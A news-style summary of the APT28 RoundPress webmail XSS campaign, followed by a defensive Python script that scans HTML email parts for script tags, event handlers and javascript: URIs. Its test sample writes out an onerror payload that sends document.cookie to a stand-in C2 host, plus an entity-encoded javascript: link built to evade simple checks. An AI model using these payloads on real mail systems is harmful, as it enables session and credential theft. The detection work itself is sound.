A major cyber-espionage campaign called RoundPress, attributed to APT28 (Fancy Bear), used multiple zero-day and n-day vulnerabilities to eavesdrop on government email communications.
The campaign targeted victims in several countries across Eastern Europe, Africa, and Latin America. The lure was a phishing email whose HTML body carried malicious JavaScript: the code executed in the victim's browser as soon as the message was rendered by a vulnerable webmail client, with no attachment to open and no link to click.
The attackers exploited cross-site scripting (XSS) flaws in the webmail applications' handling of HTML mail to run that script in the victim's authenticated session, collecting login credentials, email messages, contacts, two-factor authentication (2FA) information, and more, and exfiltrating the data to a command-and-control (C2) server.
Government organizations, military entities, defense companies, and critical infrastructure firms were among the victims of this hacking campaign, which leveraged vulnerabilities in Roundcube, MDaemon, Horde, and Zimbra.
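The practical defender's question after a campaign like this is how to find such messages in a mail store before a webmail client renders them. The following is an added example, not ESET's tooling and not derived from the real samples: it decodes every text/html part of a raw message (base64 and quoted-printable included) and flags the constructs an XSS-by-email payload needs, namely script tags, inline event handlers, active embeds, and executable URI schemes in link or source attributes. The sample messages, addresses, payload and C2 hostname are all constructed for the example. URI attribute values are entity-decoded and stripped of control characters before checking, because that is what the browser does, so an entity-encoded `javascript:` scheme is still caught; escaped text such as `&lt;script&gt;` outside an attribute is deliberately not flagged, since it renders as text rather than executing.

```python
"""Triage inbound HTML mail for the RoundPress delivery pattern: a phishing
message whose HTML body carries JavaScript that a vulnerable webmail client
executes when the message is rendered.  Added example with constructed
messages; it is not ESET's tooling and is not based on the real samples."""
import email
import html
import re
from email import policy
from email.message import EmailMessage

# Tag-level indicators, matched on the raw HTML: the browser only turns these
# into executable content if they survive as real markup, so entity-escaped
# text such as "&lt;script&gt;" is deliberately not matched here.
TAG_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"<[^>]+\son[a-z]+\s*=", re.I),
    "active_embed": re.compile(r"<\s*(?:svg|iframe|object|embed|math)\b", re.I),
}

# URI-bearing attributes.  Browsers entity-decode the value and ignore tabs,
# newlines and other control characters inside the scheme, so the check below
# normalises the same way before looking for an executable scheme.
URI_ATTR = re.compile(
    r"""\b(?:href|src|action|formaction|xlink:href|data)\s*=\s*"""
    r"""(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
EXEC_SCHEMES = ("javascript:", "vbscript:", "data:text/html")

def uri_values(body: str):
    """Yield each URI attribute value normalised the way a browser would read it."""
    for m in URI_ATTR.finditer(body):
        raw = next(g for g in m.groups() if g is not None)
        yield re.sub(r"[\x00-\x20]", "", html.unescape(raw)).lower()

def scan_html(body: str) -> list[str]:
    """Return the sorted indicator names found in one HTML body."""
    hits = {name for name, rx in TAG_INDICATORS.items() if rx.search(body)}
    if any(v.startswith(EXEC_SCHEMES) for v in uri_values(body)):
        hits.add("javascript_uri")
    return sorted(hits)

def scan_message(raw: bytes) -> list[str]:
    """Decode every text/html part (base64 / quoted-printable included) and scan it."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = set()
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True)
        charset = part.get_content_charset() or "utf-8"
        hits.update(scan_html(payload.decode(charset, errors="replace")))
    return sorted(hits)

def build_sample(html_body: str, cte: str = "base64") -> bytes:
    """Constructed test message; the addresses and body are made up."""
    msg = EmailMessage()
    msg["From"] = "sender@example.org"
    msg["To"] = "target@example.net"
    msg["Subject"] = "constructed sample"
    msg.set_content("plain-text alternative")
    msg.add_alternative(html_body, subtype="html", cte=cte)
    return msg.as_bytes()

# Benign HTML mail: a link to an https URL and no active content.
BENIGN = build_sample('<p>Invoice attached.</p><a href="https://example.com/invoice">View</a>')

# Hostile HTML mail in the RoundPress shape (hypothetical payload, hypothetical
# C2 host): an image error handler that exfiltrates the session cookie, plus an
# entity-encoded javascript: link that a naive "javascript:" substring check misses.
HOSTILE = build_sample(
    '<img src=x onerror="fetch(\'https://c2.example/?d=\'+btoa(document.cookie))">'
    '<a href="&#106;ava&#9;script:alert(document.domain)">Read more</a>')

if __name__ == "__main__":
    print("benign :", scan_message(BENIGN))    # []
    print("hostile:", scan_message(HOSTILE))   # ['event_handler', 'javascript_uri']
```

Run it over an mbox or a directory of .eml files by feeding each raw message to `scan_message`; a non-empty result is a candidate for quarantine and for checking whether the recipient's webmail build is patched against the XSS flaws the campaign used. The indicator list is intentionally narrow (high-confidence constructs only); a production filter would sit behind a real HTML parser rather than regular expressions, but the normalisation step, decoding attribute values the way the browser does before matching, is the part that most ad-hoc checks get wrong.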